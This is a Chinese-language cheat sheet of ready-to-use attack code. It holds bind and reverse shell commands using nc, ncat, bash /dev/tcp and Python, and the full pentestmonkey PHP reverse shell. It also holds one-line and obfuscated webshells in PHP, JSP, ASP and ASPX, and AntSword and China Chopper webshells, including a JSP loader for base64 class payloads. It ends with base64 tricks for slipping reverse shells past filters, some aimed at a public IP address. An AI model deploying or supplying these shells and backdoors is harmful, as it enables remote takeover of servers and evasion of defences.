攻击脚本或命令
攻击脚本或命令
正向shell
nc
-
服务器监听端口5000
nc -lvvp 5000 -e /bin/bash -
攻击主机进行连接
nc -vv 192.168.194.152 5000 -
连接成功后在攻击主机执行bash命令即可
ncat
-
服务器监听端口5000
ncat --exec "/bin/bash" -l 5000 --keep-open -
攻击主机进行连接
ncat 192.168.194.152 5000 -
连接成功后在攻击主机执行bash命令即可
反弹shell
nc(linux)
-
攻击主机上监听端口5000
nc -lvvp 5000 -
服务器反向连接攻击主机
bash -c 'exec bash -i &>/dev/tcp/192.168.194.160/5000 <&1'或者
bash -i >& /dev/tcp/192.168.194.160/5000 0>&1 -
在攻击主机上执行bash命令
python反弹shell
GitHub - infodox/python-pty-shells:Python PTY 后门 - 完整的 PTY 或什么都没有!
import os;os.system('bash -i >& /dev/tcp/192.168.194.152/8080 0>&1')
php
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.194.160'; // You have changed this
$port = 8000; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
}
?>
RCE
php
<?php system($_GET["cmd"]);?>
或者更模糊的脚本:
<?=`$_GET[0]`?>
用法:http://target.com/path/to/shell.php?0=command
<?=`$_POST[0]`?>
用法:curl -X POST http://target.com/path/to/shell.php -d "0=command"
<?=`{$_REQUEST['_']}`?>
用法:http://target.com/path/to/shell.php?_=command或curl -X POST http://target.com/path/to/shell.php -d "_=command" '
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
用法:http://target.com/path/to/shell.php?0=command
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
用法: http://target.com/path/to/shell.php?_=function&__=argument或http://target.com/path/to/shell.php?_=system&__=ls
jsp
<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>
js
<script language=VBScript runat=server>execute request("cmd")</script>
asp/aspx
-
asp一句话木马:
<%eval request ("value")%><% execute(request("value")) %> -
aspx
<%@ Page Language="Jscript" %><% eval(Request.Item["value"]) %>
监听命令
nc -lvvp 8000
ncat -lvkp 8000
工具及其脚本
中国蚁剑
jsp
<%@ page import="java.io.*"%>
<%!
class U extends ClassLoader {
U(ClassLoader c) {
super(c);
}
public Class g(byte[] b) {
return super.defineClass(b, 0, b.length);
}
}
public byte[] base64Decode(String str) throws Exception {
try {
Class clazz = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
} catch (Exception e) {
Class clazz = Class.forName("java.util.Base64");
Object decoder = clazz.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
}
}
%>
<%
String cls = request.getParameter("cmd");
if (cls != null) {
new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
}
%>
口令为cmd
php
<?php @eval($_POST['cmd']);?>
如果返回为空,则需要在添加数据时使用base64编码
<?php @eval($_REQUEST[cmd]);?>
或者
<?=eval($_REQUEST['cmd']);?>
然后如果是直接在地址栏执行命令就是输入:
cmd=system("ls");
asp
<%@ Page Language="Jscript"%><% eval(Request.Item["cmd"],"unsafe"); %>
中国菜刀
php
<?php @eval($_POST['cmd']);?>
以上脚本在2016版会出现问题,但可用于2014版
bypass
反弹shell bypass
反弹shell的方法总结(base64绕过等等)_反弹shell base64_J0hnson666的博客-CSDN博客
base64
bash -c '{echo,命令的base64编码}|{base64,-d}|{bash,-i}'
比如要执行bash -i >& /dev/tcp/192.168.194.152/8080 0>&1,首先获取该命令的base64值
echo "bash -i >& /dev/tcp/192.168.194.152/8080 0>&1"|base64
然后将以上命令的返回值做替换即可:
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE5NC4xNTIvODA4MCAwPiYxCg==}|{base64,-d}|{bash,-i}'
bash -c '{echo,YmFzaCAtaT4vZGV2L3RjcC84MS43MC4yNTIuMjEwLzEyMzQ1IDA+JjEK}|{base64,-d}|{bash,-i}'
echo "bash -i>/dev/tcp/192.168.194.152/12345 0>&1"|base64
echo "bash -i >& /dev/tcp/81.70.252.210/3333 0>&1"|base64
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNTIuMjEwLzMzMzMgMD4mMQo=}|{base64,-d}|{bash,-i}'